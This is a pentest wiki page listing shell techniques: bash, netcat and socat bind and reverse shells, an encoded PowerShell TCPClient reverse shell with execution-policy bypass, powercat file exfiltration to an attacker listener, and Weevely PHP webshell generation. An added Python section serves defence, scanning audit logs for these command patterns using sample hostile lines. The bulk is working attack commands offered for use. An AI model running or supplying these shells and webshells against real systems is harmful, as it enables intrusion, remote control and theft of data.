Shells

From pentestwiki.org

Classic methods

bash

Bash reverse shell:

On attacker:

$nc -nvv -lp 8080


On target:

$bash -i >& /dev/tcp/$IP/8080 0>&1


netcat

  • netcat bindshell

On target:

$nc -nvvlp 8989 -e /bin/bash


On attacker:

$nc -nvv $IP 8989


  • netcat reverse shell:

On attacker:

$nc -nvvlp 8989 $IP


On target:

$nc -nvv $IP 8989 -e /bin/bash


  • To improve the shell (Method 1) @JFaust0 :
Ctrl+Z
stty raw -echo
fg
reset
  • To improve interactive shell (Method 2):
$python -c 'import pty; pty.spawn("/bin/bash")'


socat

Syntax:

$socat [options] address1 address2

Examples of address:

  • -
  • stdio
  • tcp4:localhost:1080
  • tcp4-listen:8080 = tcp-l:8080
  • udp4:host:2049
  • udp4-l:500
  • exec:/bin/ls,pty
  • socks:socks.local:$IP:80
  • proxy:proxy.local:$IP:443
  • ssl-l:443,cert=./server.pem
  • open:file.txt
  • create:newfile.txt
  • UDP4-DATAGRAM:255.255.255.255:9999,bind=:9999,range=192.168.0.0/24
  • TUN:192.168.1.2/24,iff-up=1



  • Socat bindshell

On target:

$socat TCP-LISTEN:1337,reuseaddr,fork EXEC:bash,pty,stderr,setsid,sigint,sane


On attacker:

$socat FILE:`tty`,raw,echo=0 TCP:$IP:1337


  • Socat reverse shell

On attacker:

$socat TCP-LISTEN:1337,reuseaddr FILE:`tty`,raw,echo=0


On target:

$socat TCP4:$IP:1337 EXEC:bash,pty,stderr,setsid,sigint,sane


  • Build a VPN with socat:

On server:

root# socat tcp-l:50500 TUN:192.168.10.2/24,iff-up=1


On client ($IP is the server address):

root# socat tcp:$IP:50500 TUN:192.168.10.3/24,iff-up=1


Windows PowerShell

PS>$str='$client=New-Object System.Net.Sockets.TCPClient("'+$LHOST+'",'+$LPORT+');$stream= $client.GetStream();[byte[]]$bytes=0..65535|%{0};while(($i=$stream.Read($bytes,0,$bytes.Length)) -ne 0){;$data =(New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0,$i);$sendback=(iex $data 2>&1|Out-String );$sendback2=$sendback+"PS "+(pwd).Path+"> ";$sendbyte=([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()'
PS>$b=[Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($str))
PS>echo "powershell -ep bypass -nop -encodedcommand $b" | clip


Then paste (Ctrl+V) directly into a terminal on the target.
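As an added defender-side example (not part of the original wiki page), the following Python scans process-audit records for the command-line shapes shown in the bash, netcat, socat and PowerShell sections above: the /dev/tcp redirection, nc -e, socat EXEC:, pty.spawn, and a powershell -encodedcommand payload, which it base64/UTF-16LE decodes before inspecting. The record layout (host pid= user= cmd=) and the sample lines are constructed for this example.

```python
import base64
import re
# Patterns lifted from this page's bash, netcat, socat and pty one-liners.
INDICATORS = [
    ("bash-devtcp", re.compile(r"/dev/tcp/\S+/\d+")),
    ("nc-exec", re.compile(r"\bn(?:c|cat|etcat)\b.*\s-e\s+\S*sh\b")),
    ("socat-exec", re.compile(r"\bsocat\b.*\bEXEC:", re.I)),
    ("pty-spawn", re.compile(r"pty\.spawn\(")),
]
ENC_RX = re.compile(r"-enc\w*\s+([A-Za-z0-9+/=]+)", re.I)  # -EncodedCommand <b64>
PS_RX = re.compile(r"Net\.Sockets\.TCPClient", re.I)       # the page's PS client
LINE_RX = re.compile(r"(?P<host>\S+) pid=(?P<pid>\d+) user=\S+ cmd=(?P<cmd>.*)")

def decode_encoded_command(cmd):
    """Decode a -EncodedCommand payload (base64 of UTF-16LE) to text, or None."""
    m = ENC_RX.search(cmd)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def scan_cmdline(cmd):
    """Names of every indicator that fires on one command line."""
    hits = [name for name, rx in INDICATORS if rx.search(cmd)]
    decoded = decode_encoded_command(cmd)
    if decoded is not None and PS_RX.search(decoded):
        hits.append("ps-encoded-tcpclient")
    return hits

def scan_logs(text):
    """(host, pid, hits) per audit line of the assumed 'host pid= user= cmd=' layout."""
    findings = []
    for line in text.splitlines():
        m = LINE_RX.match(line)
        if m and (hits := scan_cmdline(m.group("cmd"))):
            findings.append((m.group("host"), int(m.group("pid")), hits))
    return findings

# Constructed sample records (203.0.113.5 is a documentation address), not real telemetry.
PS_PAYLOAD = '$client=New-Object System.Net.Sockets.TCPClient("203.0.113.5",4444)'
ENCODED = base64.b64encode(PS_PAYLOAD.encode("utf-16-le")).decode()
SAMPLE_LOGS = "\n".join([
    "h1 pid=4122 user=www-data cmd=bash -i >& /dev/tcp/203.0.113.5/8080 0>&1",
    "h1 pid=4130 user=www-data cmd=nc -nvv 203.0.113.5 8989 -e /bin/bash",
    "h2 pid=917 user=root cmd=socat TCP4:203.0.113.5:1337 EXEC:bash,pty,stderr,setsid,sigint,sane",
    "h2 pid=920 user=alice cmd=python -c 'import pty; pty.spawn(\"/bin/bash\")'",
    "h4 pid=5512 user=SYSTEM cmd=powershell -ep bypass -nop -encodedcommand " + ENCODED,
])
```

Running `scan_logs(SAMPLE_LOGS)` flags each of the five constructed records with exactly one indicator name; benign command lines such as `ls -la` produce no findings.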

USB man-in-the-middle

  • proxy a USB serial device (/dev/ttyUSB0) over IP

Remote:

$socat /dev/ttyUSB0,raw,echo=0 tcp-listen:1337,reuseaddr

Local:

$socat PTY,raw,echo=0,link=/dev/ttyVUSB0 tcp:<target>:1337


tsh

Tiny SHell (tsh) is an open-source UNIX backdoor written in C.

PowerShell modules

Powercat

netcat functionality implemented in PowerShell; no extra packages are required. Useful for data exfiltration.

On target (connect to the attacker's listener on port 80 and send input.txt):

C:\>powershell -exec bypass
PS>Import-Module .\powercat.ps1
PS>powercat -c $IP -p 80 -i input.txt


On attacker:

$nc -vvlp 80 > input.txt


Reference: https://github.com/besimorhino/powercat

Webshells

Weevely

Generate a PHP agent protected by the password AbC and write it to the given path:

$python weevely.py generate AbC /var/www/html/AbC.txt